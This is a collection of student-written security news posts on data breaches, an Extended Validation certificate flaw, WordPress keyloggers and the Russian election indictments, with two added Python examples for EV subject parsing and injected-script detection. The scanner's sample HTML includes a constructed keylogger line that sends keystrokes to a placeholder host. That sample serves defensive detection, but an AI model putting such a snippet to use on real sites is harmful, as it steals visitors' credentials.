Marine Force Data Leak


More than 20,000 US Marine sailors' identities and information were exposed when an email with sensitive data was sent to the wrong email distribution list by the Defense Travel System (DTS).

The email had an attachment containing personal and sensitive data such as social security numbers, bank account information, credit card information, and mailing addresses.

Andrew Aranda, a spokesman for the Marine Forces, said that “no malicious intent was involved” and that some changes will be made to prevent similar incidents from happening in the future.

According to Paul Edon, an information technology professional and director at Tripwire, there should be regular checkups of the system and access limitations for sensitive information, since these military systems store a lot of it.

With their personal information exposed, victims should change their passwords and keep checking their bank accounts continuously in case of any potential breach, said Paul Edon.

– Mohammed Alhamadah

Sources:

https://www.infosecurity-magazine.com/news/marines-21000-breach/

http://www.newsweek.com/us-marines-data-breach-leak-soldier-secrets-hits-21000-soldiers-civilians-825382


Patients’ info from University of Virginia at risk

The University of Virginia (UVA) has issued an apology to the patients who were affected by a data breach. On December 23, 2017, UVA became aware that an unauthorized third party had had access to patient information from May 3, 2015 to December 27, 2016 through a laptop owned by one of the physicians of the university’s health system. The physician had access to patient records that would allow him to see information including: patient name, diagnoses, treatment, date of birth and home address. Patients’ financial status and social security numbers were said not to be accessible, but patients’ healthcare information was not detailed in the report.

The university has been working with the FBI, and an internal investigation was done. The FBI has arrested the third-party individual and can confirm from interrogation that patients’ information was not used or shared in any way. Letters have been sent out to the affected patients, about 1900 or so individuals, asking them to review statements and verify information sent from their health insurance provider. For patients who find incorrect information, a dedicated support line was opened by UVA for this matter. The call center specializes in assisting patients who look to correct or invalidate inquiries regarding the incident.

As for the security of UVA, they issued this statement: “We are sorry this happened and regret any inconvenience or concern this incident may cause our patients. To help prevent something like this from happening in the future, we are enhancing the security measures required to remotely access UVA Health System information.” The details behind UVA enhancing security have not been disseminated yet.
— Serge Louis

Sources:

https://uvahealth.com/privacy-notice-for-uva-health-system-patients

https://www.scmagazine.com/2000-uva-health-system-patients-information-compromised/article/745936/

UVA Health System warns patients of data breach

Extended Validation is Broken

Extended Validation is a tool that can be used by site owners in order to prove the identity of their site beyond a standard HTTPS certificate. While an HTTPS certificate proves that the server you are communicating with is the site identified by the domain name, it can be easy to spoof domain names for some sites (like facebok.com). If a site is verified, a person may be likely to trust it without verifying the domain name.

In order to receive an Extended Validation certificate, one must prove to a Certificate Authority that they “are” that name, rather than just owning the domain name. Most commonly, this is done by proving that you own a company by that name – which is a fairly secure system. However, in this report, Ian Carroll exploits a vulnerability not in the technical system, but in the United States.

In America, the same company name can be registered in different states (since, for all practical purposes, we are 50 separate countries that are just really friendly). Carroll takes advantage of this fact by registering the company name “Stripe, Inc.” in Kentucky (Stripe is a popular payment platform, registered in Delaware). He uses the site registered with this certificate not for malicious purposes but in order to spread awareness of the vulnerability, hosting his whitepaper on the vulnerability there.

This issue raises many questions on how we should be verifying identity, as well as how browsers should deliver verification information to the client. The entire vulnerability is completely technically sound in that the entire process does what it should (the company named “Stripe, Inc.” has been verified to serve this content). There is, unfortunately, no simple way to solve this problem. Should the certificate authority only issue these certificates for companies that are “big” or, even more ambiguously, “well-known”, and deny verification to startups? Should the browser also display the state name of registration along with the certificate (assuming that the common citizen knows the state name of every website he or she visits)? These are not difficult answers, but their answers are fundamental to the future of identification in an increasingly automated world.


– Ryan Volz
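The post's central point is that an EV certificate does carry enough to tell two companies with the same name apart (the EV Guidelines require the organization name, a business category, the registration number as `serialNumber`, and the jurisdiction of incorporation), but browsers historically showed only the name. The following is an added example, not code from the post or from Ian Carroll's report: it takes certificate subjects in the tuple-of-tuples shape `ssl.SSLSocket.getpeercert()['subject']` uses, checks whether they are EV-shaped, and builds the label a client could display with and without the jurisdiction. Both subjects, the registration numbers and the host names are constructed; "Stripe, Inc." in Delaware and in Kentucky are the two entities the post describes.

```python
"""Added example: what an EV certificate subject carries and what a client
could render from it.  The subjects below are constructed test data in the
shape ssl.SSLSocket.getpeercert()['subject'] returns (a tuple of RDNs, each
a tuple of (attribute, value) pairs); none of them is a real certificate."""

# Subject attributes the CA/Browser Forum EV Guidelines require.  The
# jurisdiction attributes are the EV-specific ones (OpenSSL long names).
EV_REQUIRED = (
    "organizationName",
    "businessCategory",
    "serialNumber",            # company registration number, not the cert serial
    "jurisdictionCountryName",
)


def subject_to_dict(subject):
    """Flatten a getpeercert()-style subject into {attribute: value}."""
    flat = {}
    for rdn in subject:
        for name, value in rdn:
            flat[name] = value
    return flat


def is_ev_shaped(subject):
    """True when every EV-required attribute is present."""
    flat = subject_to_dict(subject)
    return all(attr in flat for attr in EV_REQUIRED)


def legal_identity(subject):
    """The tuple that actually identifies the legal entity behind an EV cert:
    name, state of registration, country and registration number.  Returns
    None for a non-EV subject (domain validation says nothing about an entity)."""
    if not is_ev_shaped(subject):
        return None
    flat = subject_to_dict(subject)
    return (
        flat["organizationName"],
        flat.get("jurisdictionStateOrProvinceName", ""),
        flat["jurisdictionCountryName"],
        flat["serialNumber"],
    )


def display_label(subject, show_jurisdiction=True):
    """The text a browser could show in its address bar.  With
    show_jurisdiction=False this is the name-only label the post criticizes;
    with it the two same-named companies become distinguishable."""
    ident = legal_identity(subject)
    if ident is None:
        return None
    org, state, country, _ = ident
    if not show_jurisdiction:
        return org
    where = ", ".join(part for part in (state, country) if part)
    return f"{org} ({where})"


def same_legal_entity(subject_a, subject_b):
    """Two EV subjects name the same entity only if the whole identity matches."""
    a, b = legal_identity(subject_a), legal_identity(subject_b)
    return a is not None and a == b


# Constructed subjects (registration numbers and hostnames are placeholders).
STRIPE_DELAWARE = (
    (("jurisdictionCountryName", "US"),),
    (("jurisdictionStateOrProvinceName", "Delaware"),),
    (("businessCategory", "Private Organization"),),
    (("serialNumber", "PLACEHOLDER-DE-0001"),),
    (("countryName", "US"),),
    (("organizationName", "Stripe, Inc."),),
    (("commonName", "payments.example"),),
)
STRIPE_KENTUCKY = (
    (("jurisdictionCountryName", "US"),),
    (("jurisdictionStateOrProvinceName", "Kentucky"),),
    (("businessCategory", "Private Organization"),),
    (("serialNumber", "PLACEHOLDER-KY-0001"),),
    (("countryName", "US"),),
    (("organizationName", "Stripe, Inc."),),
    (("commonName", "lookalike.example"),),
)
# A plain domain-validated subject carries no organization at all.
DV_ONLY = ((("commonName", "blog.example"),),)

if __name__ == "__main__":
    for subj in (STRIPE_DELAWARE, STRIPE_KENTUCKY, DV_ONLY):
        print(display_label(subj, show_jurisdiction=False),
              "->", display_label(subj))
    print("same entity:", same_legal_entity(STRIPE_DELAWARE, STRIPE_KENTUCKY))
```

Run as a script it prints the name-only label twice as "Stripe, Inc." and only the jurisdiction-bearing label tells the two apart; `DV_ONLY` yields `None` because there is no entity to name. The point for a client or monitoring tool is that the disambiguating data already sits in the subject, so the decision is purely about what to surface to the user.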

Keyloggers and cryptocurrency mining on infected WordPress sites

About four weeks ago (a little after the start of this class….. 🤔), it was discovered that thousands of WordPress sites were being used to mine Monero cryptocurrency, along with using a keylogger to capture users’ login information, and possibly more. It functioned in such a way that users didn’t even have to hit the submit button in order to have their credentials stolen, and mining would start simply by visiting the page.

The keylogger runs on the entirety of the infected site, which opens the door for more than just WordPress logins to be captured, but also any data passed through the infected websites, such as possible bank credentials and e-mail addresses.

According to Bleeping Computer, 2,000 sites were infected by the keylogger. There’s no real way to tell if you are visiting an infected site without inspecting the source (and knowing what you’re looking for), so until the virus is wiped out, people should be wary of any WordPress managed site. If your browser suddenly starts eating up processing power when visiting a WordPress site, there is a good chance you’ve visited an infected one, and your computer is being used to mine Monero while you visit it.

Security experts still aren’t sure what caused the vulnerability aside from a blanket “WordPress is just bad” and “this happens all the time to WordPress.”

Security experts are backing up their claims of WordPress’s dismal security practices by pointing out that within the past two months another entirely different keylogger was found infecting WordPress, which infected 5,482 sites. This entirely separate keylogger was injected into Cloudflare scripts that used fake linter.js URLs.

If the site has this malware running on it, there also is a chance that it also is using your computer to do cryptocurrency mining, but instead of mining only for Monero, this malware can mine whatever cryptocurrency the hacker so decides.

WordPress is so prone to hacking that there is a monthly journal to keep track of what WordPress vulnerabilities were found. Though it is hard to keep 18.9% of the internet running safely, and though it is easy to blame WordPress for not handling these attacks, part of the responsibility does lie with the admins of the pages.

However, the fact that WordPress seems to be this insecure just shows the kind of caution you need when going anywhere online.

– Skyler Clark

https://hotforsecurity.bitdefender.com/blog/keylogger-found-on-thousands-of-wordpress-based-sites-stealing-every-keypress-as-you-type-19501.html

https://blog.sucuri.net/2017/12/cloudflare-solutions-keylogger-on-thousands-of-infected-wordpress-sites.html

https://www.wordfence.com/blog/category/wordpress-security/
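The post says there is no real way to tell an infected site apart without inspecting the source and knowing what to look for. The following is an added example, not code from the post or from Sucuri, Wordfence or Bitdefender, of what a site administrator can look for in their own pages: a `<script src>` pointing at a host the site does not normally load from (the fake linter.js case the post mentions) and inline JavaScript that registers keystroke handlers, which is how credentials get captured before the submit button is pressed. The allowed host list, the sample HTML and the `.invalid` host name are constructed for the example.

```python
"""Added example: scan a page's HTML for the two injection patterns the post
describes.  Host names, the allowlist and the sample page are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts this hypothetical site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"example.com", "www.example.com", "cdn.example.com"}

# DOM events a keystroke-capturing script has to listen for.
KEY_EVENTS = ("keydown", "keyup", "keypress")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []       # src attribute of every <script src=...>
        self.inline = []         # body of every inline <script>...</script>
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self.inline.append("")

    def handle_data(self, data):
        # HTMLParser hands script content to handle_data, possibly in chunks.
        if self._in_inline:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_inline = False


def script_host(src):
    """Host part of a script URL; '' for same-origin (relative) URLs.
    Protocol-relative URLs like //host/x.js resolve to host as well."""
    netloc = urlsplit(src.strip()).netloc
    return netloc.split("@")[-1].split(":")[0].lower()


def scan_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (finding_kind, detail) pairs for suspicious script tags."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = script_host(src)
        if host and host not in allowed_hosts:
            findings.append(("unexpected-script-host", src))
    for body in parser.inline:
        low = body.lower()
        hooks = any(f"'{ev}'" in low or f'"{ev}"' in low for ev in KEY_EVENTS)
        if hooks and "addeventlistener" in low:
            findings.append(("inline-keystroke-hook", body.strip()[:60]))
    return findings


# Constructed sample page: one legitimate CDN script, one same-origin script,
# one injected script on an unknown host named like the post's linter.js,
# one harmless inline script and one inline keystroke hook.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example.com/jquery.min.js"></script>
<script src="/wp-includes/js/local.js"></script>
<script type="text/javascript" src="//scripts.fake-cdn.invalid/linter.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>
document.addEventListener('keyup', function (e) {
  new Image().src = '//scripts.fake-cdn.invalid/c?k=' + e.key;  /* constructed */
});
</script>
</head><body><form id="loginform"></form></body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

Output is two findings: the `linter.js` script on the unlisted host, and the inline listener on `keyup`. The allowlist approach is deliberately simple; a real deployment would build the allowed set from a known-good copy of the theme and plugins, and treat any new host as something to explain rather than something to ignore.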

Russian Conspiracy

Since May 2017, Robert Mueller, who is Special Counsel for the United States Department of Justice and former Director of the FBI, has been leading an investigation into possible security breaches during the 2016 presidential elections. Prior to February 16, 2018, Mueller’s investigation had secured two guilty pleas, and reportedly another charged suspect is to plead guilty to conspiracy against the United States.

On February 16, 2018, Special Counsel Robert Mueller filed charges against 13 Russian nationals for conspiracy to defraud the United States. It is suspected that these Russian nationals’ intent was to create massive discord in the American political arena. They accomplished this by actively campaigning against Hillary during the campaign. These Russian nationals are suspected of entering the United States under these false pretenses and using fake identities (provided by Californian citizen Richard Pinedo, who has pleaded guilty to identity fraud). By pretending to be Americans, the Russian agents were able to pay American citizens to attend rallies against Hillary Clinton and push a pro-Trump narrative.

This indictment’s prime actor is Russia’s Internet Research Agency (otherwise known as the Troll Factory). The agency is accused of creating thousands of online accounts to spread anti-Hillary sentiment within the United States. Twitter alone has stated that it has banned 3100 accounts for being associated with the Troll Farm. The agency employs VPN technology to appear as if they are logging in from devices located in America, making their work difficult to track. It is unknown how much effect the Internet Research Agency’s efforts have had on the United States election. It is unknown how widespread current efforts of this agency are.

It is unlikely that any of the accused will ever see a judge, for all the suspects are currently located in Russia. A Russian spokesperson has stated that the accusations are absurd and none of the nationals will likely be subject to extradition.


Source:

https://www.politico.com/story/2018/02/16/trump-russia-indictments-mueller-investigation-415667

List of all charges brought by the investigation:

https://en.wikipedia.org/wiki/Special_Counsel_investigation_(2017%E2%80%93present)#Charges

Full indictment (PDF):

https://www.justice.gov/file/1035477/download